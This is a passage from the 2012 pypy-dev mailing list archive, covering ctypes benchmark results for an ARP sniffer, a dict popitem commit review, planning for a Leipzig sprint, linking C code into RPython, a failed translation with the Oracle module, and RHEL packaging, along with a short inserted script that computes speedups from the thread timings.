are: 1 thread: 2031ms 2 threads: 1194ms 4 threads: 840ms 8 threads: 533ms It's worth pointing out, because it's the first time I see a measure (the last one) which is *faster* than the single-core, no-stm, no-jit version. We are not done yet, because CPython runs the same program at 303ms. But we're getting there :-) A bientôt, Armin. 
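[Archive editor's note: the scaling in Armin's STM timings can be sanity-checked with a quick back-of-the-envelope script. This is a throwaway sketch, not part of the original thread; the millisecond values and the 303 ms CPython baseline are copied verbatim from the mail above.]

```python
# STM timings reported for the "--stm -O2" build (method cache disabled);
# values are milliseconds, copied from Armin's mail above.
timings_ms = {1: 2031, 2: 1194, 4: 840, 8: 533}
cpython_ms = 303  # single-thread CPython time for the same program

for threads in sorted(timings_ms):
    ms = timings_ms[threads]
    speedup = timings_ms[1] / float(ms)   # scaling relative to 1 STM thread
    efficiency = speedup / threads        # fraction of ideal linear scaling
    print("%d threads: %4d ms  speedup %.2fx  efficiency %2.0f%%"
          % (threads, ms, speedup, efficiency * 100))

# Remaining gap between the best STM result and plain CPython:
print("8 threads vs CPython: %.2fx slower" % (timings_ms[8] / float(cpython_ms)))
```

Eight threads buy roughly a 3.8x speedup over the single-threaded STM build (about 48% parallel efficiency), while still trailing CPython by about 1.76x, which matches the "not done yet, but getting there" summary.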
From sebastien.volle at gmail.com Mon Feb 20 12:59:26 2012 From: sebastien.volle at gmail.com (=?ISO-8859-1?Q?S=E9bastien_Volle?=) Date: Mon, 20 Feb 2012 12:59:26 +0100 Subject: [pypy-dev] ctypes - PyPy 1.8 slower than Python 2.6.5 In-Reply-To: <4F422902.5030106@gmail.com> References: <4F422902.5030106@gmail.com> Message-ID: Hello Antonio, Thank you for the update. I'll try and run a long running capture. Several days worth of ARP packets should be enough to maximize JIT effect I suppose. I'll keep you updated. Regards, Sébastien Le 20 février 2012 12:05, Antonio Cuni a écrit : > Hello Sébastien, > > I worked a bit on the pypy implementation of ctypes today, and now it is > possible to pass ctypes arrays as parameters without leaving the fast path. > The benchmark is still slower on PyPy, but not as much as before. Here are > the results on my machine for running arp.py: > > cpython 2.7.2: 224 ms > pypy-c 1.8: 1059 ms > pypy-c trunk: 696 ms > > so, we are about 50% faster than before, although still slower than > CPython. > However, 224 ms is definitely too short for the JIT to warm up, so it > would be nice if you could rerun the benchmark with a larger capture file. > > It's not necessary to retranslate pypy: you can just download pypy 1.8 and > put the binary inside an updated copy of the mercurial repo (the relevant > checkin is 6566e81c76a8). > > thank you! > ciao, > Anto > > > On 02/13/2012 01:33 PM, Sébastien Volle wrote: > >> Hi all, >> >> My team is working on a project of fast packet sniffers and I'm comparing >> performance between different languages. >> So, we came up with a simple ARP sniffer that I ported to Python using >> ctypes. >> >> During my investigations, it turned out that using ctypes, PyPy 1.8 is >> 4x slower than CPython 2.6.5. >> After looking at the PyPy buglist, it seems there are a couple of open issues >> about ctypes so I figured I would ask you guys first before filing a new >> bug. 
>> >> I'm pretty new to ctypes and pypy so I'm not sure I understand what's >> going. >> My program seems to spend a lot of time in ctypes/function.py:_convert_args >> though, has the following profile trace demonstrates: >> >> $ pypy -m cProfile -s time arp.py >> Packet buffer now at 0x9CCECB2 >> Capture started >> elapsed time : 3983.84ms >> Total packets : 35571 >> packets/s : 8928.81 >> >> 7839198 function calls (7838340 primitive calls) in 4.105 seconds >> >> Ordered by: internal time >> >> ncalls tottime percall cumtime percall filename:lineno(function) >> 69876 0.546 0.000 1.584 0.000 >> function.py:480(_convert_args) >> 214696 0.256 0.000 0.429 0.000 structure.py:236(_subarray) >> 1052195 0.206 0.000 0.206 0.000 {isinstance} >> 632437 0.192 0.000 0.192 0.000 {method 'append' of 'list' >> objects} >> 175326 0.187 0.000 0.407 0.000 >> function.py:350(_call_funcptr) >> 1 0.173 0.173 4.105 4.105 arp.py:1() >> 209628 0.158 0.000 0.587 0.000 primitive.py:272(from_param) >> 214696 0.149 0.000 0.963 0.000 structure.py:90(__get__) >> 71144 0.143 0.000 0.198 0.000 structure.py:216(__new__) >> 106713 0.130 0.000 0.208 0.000 array.py:70(_CData_output) >> 105450 0.124 0.000 2.281 0.000 function.py:689(__call__) >> 69876 0.123 0.000 1.943 0.000 function.py:278(__call__) >> 321412 0.102 0.000 0.102 0.000 {method 'fromaddress' of >> 'Array' objects} >> 209628 0.088 0.000 0.811 0.000 function.py:437(_conv_param) >> 179125 0.083 0.000 0.083 0.000 {method 'fieldaddress' of >> 'StructureInstance' objects} >> 69883 0.080 0.000 0.122 0.000 primitive.py:308(__init__) >> 71142 0.076 0.000 0.320 0.000 >> structure.py:174(from_address) >> 105450 0.075 0.000 0.145 0.000 >> function.py:593(_build_result) >> 139755 0.072 0.000 0.120 0.000 >> primitive.py:64(generic_xxx_p_from_param) >> 107983 0.070 0.000 0.125 0.000 basics.py:60(_CData_output) >> 209828 0.062 0.000 0.062 0.000 {method 'get' of 'dict' >> objects} >> 107986 0.055 0.000 0.055 0.000 {method '__new__' of >> 
'_ctypes.primitive.SimpleType' objects} >> 71142 0.052 0.000 0.372 0.000 pointer.py:77(getcontents) >> 35578 0.052 0.000 0.125 0.000 pointer.py:62(__init__) >> 35576 0.050 0.000 0.062 0.000 pointer.py:83(setcontents) >> 106713 0.047 0.000 0.047 0.000 {method '__new__' of >> '_ctypes.array.ArrayMeta' objects} >> 139750 0.043 0.000 0.181 0.000 primitive.py:84(from_param_void_p) >> 209625 0.043 0.000 0.691 0.000 basics.py:50(get_ffi_param) >> 283592/283435 0.041 0.000 0.041 0.000 {len} >> 71144 0.040 0.000 0.040 0.000 {method '__new__' of >> '_ctypes.structure.StructOrUnionMeta' objects} >> 105450 0.039 0.000 0.039 0.000 {method 'free_temp_buffers' of >> '_ffi.FuncPtr' objects} >> 176683 0.037 0.000 0.037 0.000 {hasattr} >> 35571 0.037 0.000 0.423 0.000 pcap.py:89(next) >> >> >> Anyway, I attached my full project to this mail, including a sample pcap >> capture file. It requires libpcap to be installed on your system. Run >> arp.py >> to run the sniffer on the included demo.pcap capture file. >> I realize I should try and narrow down the issue some more, but I can't >> really >> afford to spend too much time on this right now so hopefully, this will >> be at >> least a bit helpful. >> >> Thanks! >> >> Regards, >> Sébastien >> >> >> _______________________________________________ >> pypy-dev mailing list >> pypy-dev at python.org >> http://mail.python.org/mailman/listinfo/pypy-dev >> > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From anto.cuni at gmail.com Mon Feb 20 13:38:14 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Mon, 20 Feb 2012 13:38:14 +0100 Subject: [pypy-dev] ctypes - PyPy 1.8 slower than Python 2.6.5 In-Reply-To: References: <4F422902.5030106@gmail.com> Message-ID: <4F423EB6.1020601@gmail.com> On 02/20/2012 12:59 PM, Sébastien Volle wrote: > Hello Antonio, > > Thank you for the update. I'll try and run a long running capture. 
Several > days worth of ARP packets should be enough to maximize JIT effect I suppose. > I'll keep you updated. to amortize the JIT warmup cost, it's probably enough to have a benchmark which runs for few seconds. No clue how many days of ARP packets are needed for that, though :-). ciao, Anto From alex.gaynor at gmail.com Mon Feb 20 18:50:00 2012 From: alex.gaynor at gmail.com (Alex Gaynor) Date: Mon, 20 Feb 2012 12:50:00 -0500 Subject: [pypy-dev] [pypy-commit] pypy default: issue1059 testing In-Reply-To: <20120220111837.4B3BB820D1@wyvern.cs.uni-duesseldorf.de> References: <20120220111837.4B3BB820D1@wyvern.cs.uni-duesseldorf.de> Message-ID: Unfortunately this commit has some bad effects. Going through an iterator in popitem() will result in O(N**2) behavior for repeated calls. If you look at the r_dict implementation of popitem() you can see the fix there. Alex On Mon, Feb 20, 2012 at 6:18 AM, cfbolz wrote: > Author: Carl Friedrich Bolz > Branch: > Changeset: r52670:4b254e123047 > Date: 2012-02-20 12:17 +0100 > http://bitbucket.org/pypy/pypy/changeset/4b254e123047/ > > Log: issue1059 testing > > make the .__dict__.clear method of builtin types raise an error. Fix > popitem on dict proxies (builtin types raise an error, normal types > work normally). 
> > diff --git a/pypy/objspace/std/dictmultiobject.py > b/pypy/objspace/std/dictmultiobject.py > --- a/pypy/objspace/std/dictmultiobject.py > +++ b/pypy/objspace/std/dictmultiobject.py > @@ -142,6 +142,13 @@ > else: > return result > > + def popitem(self, w_dict): > + space = self.space > + iterator = self.iter(w_dict) > + w_key, w_value = iterator.next() > + self.delitem(w_dict, w_key) > + return (w_key, w_value) > + > def clear(self, w_dict): > strategy = self.space.fromcache(EmptyDictStrategy) > storage = strategy.get_empty_storage() > diff --git a/pypy/objspace/std/dictproxyobject.py > b/pypy/objspace/std/dictproxyobject.py > --- a/pypy/objspace/std/dictproxyobject.py > +++ b/pypy/objspace/std/dictproxyobject.py > @@ -3,7 +3,7 @@ > from pypy.objspace.std.dictmultiobject import W_DictMultiObject, > IteratorImplementation > from pypy.objspace.std.dictmultiobject import DictStrategy > from pypy.objspace.std.typeobject import unwrap_cell > -from pypy.interpreter.error import OperationError > +from pypy.interpreter.error import OperationError, operationerrfmt > > from pypy.rlib import rerased > > @@ -44,7 +44,8 @@ > raise > if not w_type.is_cpytype(): > raise > - # xxx obscure workaround: allow cpyext to write to > type->tp_dict. > + # xxx obscure workaround: allow cpyext to write to > type->tp_dict > + # xxx even in the case of a builtin type. > # xxx like CPython, we assume that this is only done early > after > # xxx the type is created, and we don't invalidate any cache. 
> w_type.dict_w[key] = w_value > @@ -86,8 +87,14 @@ > for (key, w_value) in > self.unerase(w_dict.dstorage).dict_w.iteritems()] > > def clear(self, w_dict): > - self.unerase(w_dict.dstorage).dict_w.clear() > - self.unerase(w_dict.dstorage).mutated(None) > + space = self.space > + w_type = self.unerase(w_dict.dstorage) > + if (not space.config.objspace.std.mutable_builtintypes > + and not w_type.is_heaptype()): > + msg = "can't clear dictionary of type '%s'" > + raise operationerrfmt(space.w_TypeError, msg, w_type.name) > + w_type.dict_w.clear() > + w_type.mutated(None) > > class DictProxyIteratorImplementation(IteratorImplementation): > def __init__(self, space, strategy, dictimplementation): > diff --git a/pypy/objspace/std/test/test_dictproxy.py > b/pypy/objspace/std/test/test_dictproxy.py > --- a/pypy/objspace/std/test/test_dictproxy.py > +++ b/pypy/objspace/std/test/test_dictproxy.py > @@ -22,6 +22,9 @@ > assert NotEmpty.string == 1 > raises(TypeError, 'NotEmpty.__dict__.setdefault(15, 1)') > > + key, value = NotEmpty.__dict__.popitem() > + assert (key == 'a' and value == 1) or (key == 'b' and value == 4) > + > def test_dictproxyeq(self): > class a(object): > pass > @@ -43,6 +46,11 @@ > assert s1 == s2 > assert s1.startswith('{') and s1.endswith('}') > > + def test_immutable_dict_on_builtin_type(self): > + raises(TypeError, "int.__dict__['a'] = 1") > + raises(TypeError, int.__dict__.popitem) > + raises(TypeError, int.__dict__.clear) > + > class AppTestUserObjectMethodCache(AppTestUserObject): > def setup_class(cls): > cls.space = gettestobjspace( > diff --git a/pypy/objspace/std/test/test_typeobject.py > b/pypy/objspace/std/test/test_typeobject.py > --- a/pypy/objspace/std/test/test_typeobject.py > +++ b/pypy/objspace/std/test/test_typeobject.py > @@ -993,7 +993,9 @@ > raises(TypeError, setattr, list, 'append', 42) > raises(TypeError, setattr, list, 'foobar', 42) > raises(TypeError, delattr, dict, 'keys') > - > + raises(TypeError, 'int.__dict__["a"] = 1') > + 
raises(TypeError, 'int.__dict__.clear()') > + > def test_nontype_in_mro(self): > class OldStyle: > pass > _______________________________________________ > pypy-commit mailing list > pypy-commit at python.org > http://mail.python.org/mailman/listinfo/pypy-commit > -- "I disapprove of what you say, but I will defend to the death your right to say it." -- Evelyn Beatrice Hall (summarizing Voltaire) "The people's good is the highest law." -- Cicero -------------- next part -------------- An HTML attachment was scrubbed... URL: From mmueller at python-academy.de Mon Feb 20 20:55:47 2012 From: mmueller at python-academy.de (=?UTF-8?B?TWlrZSBNw7xsbGVy?=) Date: Mon, 20 Feb 2012 20:55:47 +0100 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: References: <4EFF29FF.7040009@python-academy.de> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> <4F3BEAFB.9000406@gmail.com> <4F3D700D.5010009@python-academy.de> <4F3D90DD.2010804@gmail.com> <4F3EB310.5090208@python-academy.de> Message-ID: <4F42A543.6070504@python-academy.de> I conclude from this thread that we settled for June 22 - 27. Other conclusions? If no, we found the date and I would like to fix it. Mike Am 17.02.12 21:40, schrieb Stefan Behnel: > Mike Müller, 17.02.2012 21:05: >> Am 17.02.12 20:26, schrieb Maciej Fijalkowski: >>> On Fri, Feb 17, 2012 at 9:16 PM, Stefan Behnel wrote: >>>> Just a note that I'll be in Leipzig up to the 15th of June anyway (giving a >>>> Cython course). I don't know if the week after that suits *anyone* >>>> (including Mike), but if you could move the sprint another week earlier, >>>> I'd arrange to stay for the week-end (16/17th) and we could discuss >>>> Cython/PyPy integration topics there. >> >> This week is still available. 
>> >>> I'm afraid I can't make it that early :( Since my home base is cape >>> town travelling back and forth for 10 days just does not make any >>> sense. >>> >>> 22-27 (being all full sprint days right? we usually do 3 + 1 + 3 >>> including weekends) sounds very good to me. >> >> I think the one with the longest traveling distance should get the highest >> priority, which puts 22-27 into the pole positions. > > Agreed. > > >> Stefan: How about coming to Leipzig again? I know it is about 5 hours >> by train (much longer than it needs to be :( ). Train tickets get rather >> inexpensive when booked well ahead and valid for a specific train only. >> Well, there is still the extra time. > > Yes, 5:30 hours for a direct connection is exceedingly long for that > distance - Hamburg is about the same time. But if there is serious > interest, I'll see if I can make it for the Friday. > > Stefan > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev From arigo at tunes.org Mon Feb 20 23:35:09 2012 From: arigo at tunes.org (Armin Rigo) Date: Mon, 20 Feb 2012 23:35:09 +0100 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: <4F42A543.6070504@python-academy.de> References: <4EFF29FF.7040009@python-academy.de> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> <4F3BEAFB.9000406@gmail.com> <4F3D700D.5010009@python-academy.de> <4F3D90DD.2010804@gmail.com> <4F3EB310.5090208@python-academy.de> <4F42A543.6070504@python-academy.de> Message-ID: Hi Mike, On Mon, Feb 20, 2012 at 20:55, Mike Müller wrote: > I conclude from this thread that we settled for June 22 - 27. > Other conclusions? > If no, we found the date and I would like to fix it. I agree. Thanks a lot Mike! A bientôt, Armin. 
From gbowyer at fastmail.co.uk Tue Feb 21 00:46:52 2012 From: gbowyer at fastmail.co.uk (Greg Bowyer) Date: Mon, 20 Feb 2012 15:46:52 -0800 Subject: [pypy-dev] Biting off more than I can chew Message-ID: <4F42DB6C.7010307@fastmail.co.uk> The other night I got this burning desire to recreate the Azul GPGC (the java pauseless collector) inside pypy, with a view that it could be used alongside the STM work to make pypy a low (no?) pause concurrent VM. When I started tackling the code I realised I might have bitten off a little more than I can chew. My question (probably one of many to irritate and annoy all the fine folks here) would be, is there a sensible way to compile into pypy a small amount of C code that can be used to bootstrap and bridge some esoteric c libraries into pypy, the code that I want to run, on startup of pypy would be the following https://bitbucket.org/GregBowyer/pypy-c4gc/changeset/0de575b3a8d1#chg-azm_mem_test/test.c I have noticed that there are a few bridges into direct c code in the pypy source, but I cannot fathom how these are linked into RPython -- Greg From amauryfa at gmail.com Tue Feb 21 01:24:04 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Tue, 21 Feb 2012 01:24:04 +0100 Subject: [pypy-dev] Biting off more than I can chew In-Reply-To: <4F42DB6C.7010307@fastmail.co.uk> References: <4F42DB6C.7010307@fastmail.co.uk> Message-ID: 2012/2/21 Greg Bowyer > My question (probably one of many to irritate and annoy all the fine folks > here) would be, is there a sensible way to compile into pypy a small amount > of C code that can be used to bootstrap and bridge some esoteric c > libraries into pypy, the code that I want to run, on startup of pypy would > be the following https://bitbucket.org/GregBowyer/pypy-c4gc/changeset/0de575b3a8d1#chg-azm_mem_test/test.c > It's not annoying at all, we use it in strategic places. 
For example, see how pypy/rlib/_rffi_stacklet.py implements a stacklet C library that can be used in RPython. It uses an "ExternalCompilationInfo" (eci) object: - separate_module_files lists the .c files you want to compile and link - separate_module_sources is an easy way to embed C snippets (each source will create a .c file) Then you can use rffi.llexternal with "compilation_info=eci" to declare a function defined in this library. -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From fijall at gmail.com Tue Feb 21 01:38:12 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Mon, 20 Feb 2012 17:38:12 -0700 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: References: <4EFF29FF.7040009@python-academy.de> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> <4F3BEAFB.9000406@gmail.com> <4F3D700D.5010009@python-academy.de> <4F3D90DD.2010804@gmail.com> <4F3EB310.5090208@python-academy.de> <4F42A543.6070504@python-academy.de> Message-ID: On Mon, Feb 20, 2012 at 3:35 PM, Armin Rigo wrote: > Hi Mike, > > On Mon, Feb 20, 2012 at 20:55, Mike Müller wrote: >> I conclude from this thread that we settled for June 22 - 27. >> Other conclusions? >> If no, we found the date and I would like to fix it. > > I agree. Thanks a lot Mike! Yes. And thank you mike for sponsoring and organizing the event! From phillip.d.class at gmail.com Tue Feb 21 16:18:39 2012 From: phillip.d.class at gmail.com (Phillip Class) Date: Tue, 21 Feb 2012 15:18:39 +0000 Subject: [pypy-dev] Building PyPy with cx_Oracle fails Message-ID: Building PyPy with cx_Oracle fails. I am using Python 2.7 on Ubuntu 64-bit with Oracle 11.2. Build command is: python translate.py -Ojit targetpypystandalone.py --withmod-oracle. 
Below is the traceback: [Timer] Timings: [Timer] annotate --- 1834.3 s [Timer] rtype_lltype --- 1697.2 s [Timer] pyjitpl_lltype --- 1216.3 s [Timer] =========================================== [Timer] Total: --- 4747.9 s [translation:ERROR] Error: [translation:ERROR] Traceback (most recent call last): [translation:ERROR] File "translate.py", line 309, in main [translation:ERROR] drv.proceed(goals) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/translator/driver.py", line 814, in proceed [translation:ERROR] return self._execute(goals, task_skip = self._maybe_skip()) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/translator/tool/taskengine.py", line 116, in _execute [translation:ERROR] res = self._do(goal, taskcallable, *args, **kwds) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/translator/driver.py", line 287, in _do [translation:ERROR] res = func() [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/translator/driver.py", line 399, in task_pyjitpl_lltype [translation:ERROR] backend_name=self.config.translation.jit_backend, inline=True) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/jit/metainterp/warmspot.py", line 48, in apply_jit [translation:ERROR] warmrunnerdesc.finish() [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/jit/metainterp/warmspot.py", line 236, in finish [translation:ERROR] self.annhelper.finish() [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/rpython/annlowlevel.py", line 240, in finish [translation:ERROR] self.finish_annotate() [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/rpython/annlowlevel.py", line 259, in finish_annotate [translation:ERROR] ann.complete_helpers(self.policy) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 180, in complete_helpers [translation:ERROR] self.complete() [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 254, in complete [translation:ERROR] 
self.processblock(graph, block) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 452, in processblock [translation:ERROR] self.flowin(graph, block) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 512, in flowin [translation:ERROR] self.consider_op(block.operations[i]) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 714, in consider_op [translation:ERROR] raise_nicer_exception(op, str(graph)) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 711, in consider_op [translation:ERROR] resultcell = consider_meth(*argcells) [translation:ERROR] File "<4444-codegen /home/pclass/Desktop/pypy/pypy/annotation/annrpython.py:749>", line 3, in consider_op_simple_call [translation:ERROR] return arg.simple_call(*args) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/annotation/unaryop.py", line 175, in simple_call [translation:ERROR] return obj.call(getbookkeeper().build_args("simple_call", args_s)) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/annotation/unaryop.py", line 706, in call [translation:ERROR] return bookkeeper.pbc_call(pbc, args) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/annotation/bookkeeper.py", line 668, in pbc_call [translation:ERROR] results.append(desc.pycall(schedule, args, s_previous_result, op)) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/annotation/description.py", line 976, in pycall [translation:ERROR] return self.funcdesc.pycall(schedule, args, s_previous_result, op) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/annotation/description.py", line 297, in pycall [translation:ERROR] result = schedule(graph, inputcells) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/annotation/bookkeeper.py", line 664, in schedule [translation:ERROR] return self.annotator.recursivecall(graph, whence, inputcells) [translation:ERROR] File 
"/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 395, in recursivecall [translation:ERROR] position_key) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 235, in addpendingblock [translation:ERROR] assert annmodel.unionof(s_oldarg, s_newarg) == s_oldarg [translation:ERROR] AssertionError': [translation:ERROR] .. v2309 = simple_call(v2301, v2302, v2303, v2304, v2305, v2306, v2307, v2308) [translation:ERROR] .. '(pypy.module.pypyjit.policy:49)PyPyJitIface._compile_hook' [translation:ERROR] Processing block: [translation:ERROR] block at 226 is a <class 'pypy.objspace.flow.flowcontext.SpamBlock'> [translation:ERROR] in (pypy.module.pypyjit.policy:49)PyPyJitIface._compile_hook [translation:ERROR] containing the following operations: [translation:ERROR] v2309 = simple_call(v2301, v2302, v2303, v2304, v2305, v2306, v2307, v2308) [translation:ERROR] --end-- [translation] start debugger... > /home/pclass/Desktop/pypy/pypy/annotation/annrpython.py(235)addpendingblock() -> assert annmodel.unionof(s_oldarg, s_newarg) == s_oldarg (Pdb+) -------------- next part -------------- An HTML attachment was scrubbed... URL: From dmalcolm at redhat.com Tue Feb 21 17:16:04 2012 From: dmalcolm at redhat.com (David Malcolm) Date: Tue, 21 Feb 2012 11:16:04 -0500 Subject: [pypy-dev] question re: ancient SSL requirement of pypy In-Reply-To: <4F3991C8.5040305@u.washington.edu> References: <4F3991C8.5040305@u.washington.edu> Message-ID: <1329840965.15787.29.camel@surprise> On Mon, 2012-02-13 at 14:42 -0800, Dale Hubler wrote: > Hello, > > I was requested to install pypy but our computers appear to be too new > to run it, having libssl.so.0.9.8e among other newer items. This > confuses me because the web page for pypy shows a 2011 date and blog > entries from 2012. Can 2005 SSL really be a requirement, I am unable > to install such an old item on a cluster where this software might be used. > > I looked at the pypy site but cannot find any supported platforms, > install guide, etc. 
I am trying this on RedHat EL 5. I tried the > binary release, but it also had the same error, no libssl.so.0.9.8, > which is true, my systems are updated. I must be missing something. > Do you have any links or other on-line info explaining how to build pypy. FWIW, I've built PyPy 1.8 in RPM form for RHEL 5 and 6, within the "EPEL" community repositories: http://fedoraproject.org/wiki/EPEL So if you've configured the EPEL repos, you can install pypy via: # yum install pypy and not have to do the translation yourself. Note that this is a side-project by me, not an "official" Red Hat-supported thing. The EPEL 5 builds of pypy 1.8 can be seen here: https://admin.fedoraproject.org/updates/FEDORA-EPEL-2012-0276 The EPEL 6 builds of pypy 1.8 can be seen here: https://admin.fedoraproject.org/updates/FEDORA-EPEL-2012-0275 Hope this is helpful Dave From lameiro at gmail.com Tue Feb 21 17:16:34 2012 From: lameiro at gmail.com (Leandro Lameiro) Date: Tue, 21 Feb 2012 17:16:34 +0100 Subject: [pypy-dev] Building PyPy with cx_Oracle fails In-Reply-To: References: Message-ID: Hi Phillip, I am not involved in the efforts to produce the RPython version of cx_Oracle, and have little knowledge of its maturity and compatibility. That said, I worked on a ctypes-based version of cx_Oracle, specifically tested with PyPy. It has a very good percentage of tests passing from the original cx_Oracle test suite, but it has not been tested in the real-world yet, and its performance is generally worse than C-based cx_Oracle. If you are interested, check it out at https://github.com/lameiro/cx_oracle_on_ctypes 2012/2/21 Phillip Class > Building PyPy with cx_Oracle fails. I am using Python 2.7 on Ubuntu 64-bit > with Oracle 11.2. Build command is: python translate.py -Ojit > targetpypystandalone.py --withmod-oracle. 
> Below is the traceback: > > [Timer] Timings: > [Timer] annotate --- 1834.3 s > [Timer] rtype_lltype --- 1697.2 s > [Timer] pyjitpl_lltype --- 1216.3 s > [Timer] =========================================== > [Timer] Total: --- 4747.9 s > [translation:ERROR] Error: > [translation:ERROR] Traceback (most recent call last): > [translation:ERROR] File "translate.py", line 309, in main > [translation:ERROR] drv.proceed(goals) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/translator/driver.py", line 814, in proceed > [translation:ERROR] return self._execute(goals, task_skip = > self._maybe_skip()) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/translator/tool/taskengine.py", line 116, > in _execute > [translation:ERROR] res = self._do(goal, taskcallable, *args, **kwds) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/translator/driver.py", line 287, in _do > [translation:ERROR] res = func() > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/translator/driver.py", line 399, in > task_pyjitpl_lltype > [translation:ERROR] backend_name=self.config.translation.jit_backend, > inline=True) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/jit/metainterp/warmspot.py", line 48, in > apply_jit > [translation:ERROR] warmrunnerdesc.finish() > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/jit/metainterp/warmspot.py", line 236, in > finish > [translation:ERROR] self.annhelper.finish() > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/rpython/annlowlevel.py", line 240, in finish > [translation:ERROR] self.finish_annotate() > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/rpython/annlowlevel.py", line 259, in > finish_annotate > [translation:ERROR] ann.complete_helpers(self.policy) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 180, in > complete_helpers > [translation:ERROR] self.complete() > [translation:ERROR] File > 
"/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 254, in > complete > [translation:ERROR] self.processblock(graph, block) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 452, in > processblock > [translation:ERROR] self.flowin(graph, block) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 512, in > flowin > [translation:ERROR] self.consider_op(block.operations[i]) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 714, in > consider_op > [translation:ERROR] raise_nicer_exception(op, str(graph)) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 711, in > consider_op > [translation:ERROR] resultcell = consider_meth(*argcells) > [translation:ERROR] File "<4444-codegen > /home/pclass/Desktop/pypy/pypy/annotation/annrpython.py:749>", line 3, in > consider_op_simple_call > [translation:ERROR] return arg.simple_call(*args) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/annotation/unaryop.py", line 175, in > simple_call > [translation:ERROR] return > obj.call(getbookkeeper().build_args("simple_call", args_s)) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/annotation/unaryop.py", line 706, in call > [translation:ERROR] return bookkeeper.pbc_call(pbc, args) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/annotation/bookkeeper.py", line 668, in > pbc_call > [translation:ERROR] results.append(desc.pycall(schedule, args, > s_previous_result, op)) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/annotation/description.py", line 976, in > pycall > [translation:ERROR] return self.funcdesc.pycall(schedule, args, > s_previous_result, op) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/annotation/description.py", line 297, in > pycall > [translation:ERROR] result = schedule(graph, inputcells) > [translation:ERROR] File > 
"/home/pclass/Desktop/pypy/pypy/annotation/bookkeeper.py", line 664, in > schedule > [translation:ERROR] return self.annotator.recursivecall(graph, whence, > inputcells) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 395, in > recursivecall > [translation:ERROR] position_key) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 235, in > addpendingblock > [translation:ERROR] assert annmodel.unionof(s_oldarg, s_newarg) == > s_oldarg > [translation:ERROR] AssertionError': > [translation:ERROR] .. v2309 = simple_call(v2301, v2302, v2303, v2304, > v2305, v2306, v2307, v2308) > [translation:ERROR] .. > '(pypy.module.pypyjit.policy:49)PyPyJitIface._compile_hook' > [translation:ERROR] Processing block: > [translation:ERROR] block at 226 is a <class > 'pypy.objspace.flow.flowcontext.SpamBlock'> > [translation:ERROR] in > (pypy.module.pypyjit.policy:49)PyPyJitIface._compile_hook > [translation:ERROR] containing the following operations: > [translation:ERROR] v2309 = simple_call(v2301, v2302, v2303, v2304, > v2305, v2306, v2307, v2308) > [translation:ERROR] --end-- > [translation] start debugger... > > > 